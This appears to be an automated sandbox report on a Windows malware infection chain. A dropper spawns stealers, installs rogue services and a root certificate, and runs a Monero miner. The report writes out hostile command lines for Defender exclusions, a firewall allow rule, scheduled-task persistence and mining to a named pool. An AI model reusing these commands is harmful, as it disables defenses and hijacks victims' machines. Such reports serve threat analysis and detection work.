Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Temp\973247.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A
N/A N/A C:\Windows\Temp\973247.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3032 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 3032 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 3032 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 3032 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 2636 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
PID 2636 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
PID 2636 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
PID 2636 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
PID 2804 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe C:\Windows\SysWOW64\WerFault.exe
PID 2804 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe C:\Windows\SysWOW64\WerFault.exe
PID 2804 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe C:\Windows\SysWOW64\WerFault.exe
PID 2804 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe C:\Windows\SysWOW64\WerFault.exe
PID 2636 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
PID 2636 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
PID 2636 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
PID 2636 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
PID 2152 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe C:\Windows\SysWOW64\WerFault.exe
PID 2152 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe C:\Windows\SysWOW64\WerFault.exe
PID 2152 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe C:\Windows\SysWOW64\WerFault.exe
PID 2152 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe C:\Windows\SysWOW64\WerFault.exe
PID 2636 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
PID 2636 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
PID 2636 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
PID 2636 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
PID 2636 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2636 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2636 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2636 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2636 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2636 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2636 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 772 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 772 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 772 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 772 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 772 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 772 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 772 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 688 wrote to memory of 2476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 688 wrote to memory of 2476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 688 wrote to memory of 2476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 688 wrote to memory of 2476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 688 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 688 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 688 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 688 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 688 wrote to memory of 672 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 672 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 672 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 672 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 2084 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 2084 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 2084 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 2084 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 1332 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 1332 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 1332 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 688 wrote to memory of 1332 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 1532 wrote to memory of 2264 N/A C:\Program Files (x86)\GameSyncLink\GameService.exe C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
PID 1532 wrote to memory of 2264 N/A C:\Program Files (x86)\GameSyncLink\GameService.exe C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe

"C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe"

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"

C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe

"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 116

C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 52

C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"

C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe

"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "

C:\Windows\SysWOW64\sc.exe

Sc stop GameServerClient

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove GameServerClient confirm

C:\Windows\SysWOW64\sc.exe

Sc delete GameSyncLink

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove GameSyncLink confirm

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService start GameSyncLink

C:\Program Files (x86)\GameSyncLink\GameService.exe

"C:\Program Files (x86)\GameSyncLink\GameService.exe"

C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe

"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"

C:\Windows\Temp\173859.exe

"C:\Windows\Temp\173859.exe" --list-devices

C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe

"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 52

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "

C:\Windows\SysWOW64\sc.exe

Sc stop GameServerClientC

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove GameServerClientC confirm

C:\Windows\SysWOW64\sc.exe

Sc delete PiercingNetLink

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove PiercingNetLink confirm

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService start PiercingNetLink

C:\Program Files (x86)\GameSyncLink\GameService.exe

"C:\Program Files (x86)\GameSyncLink\GameService.exe"

C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe

"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"

C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe

"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "

C:\Windows\SysWOW64\sc.exe

Sc delete GameSyncLinks

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove GameSyncLinks confirm

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1944 -s 52

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService start GameSyncLinks

C:\Program Files (x86)\GameSyncLink\GameService.exe

"C:\Program Files (x86)\GameSyncLink\GameService.exe"

C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe

"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Temp\973247.exe

"C:\Windows\Temp\973247.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe

"C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe"

C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe

"C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe"

C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe

"C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {C2AB9FA7-5A21-47BC-A898-BF88956AE018} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240514013700.log C:\Windows\Logs\CBS\CbsPersist_20240514013700.cab

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe

"C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe"

C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe

"C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe'

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'

C:\Windows\system32\netsh.exe

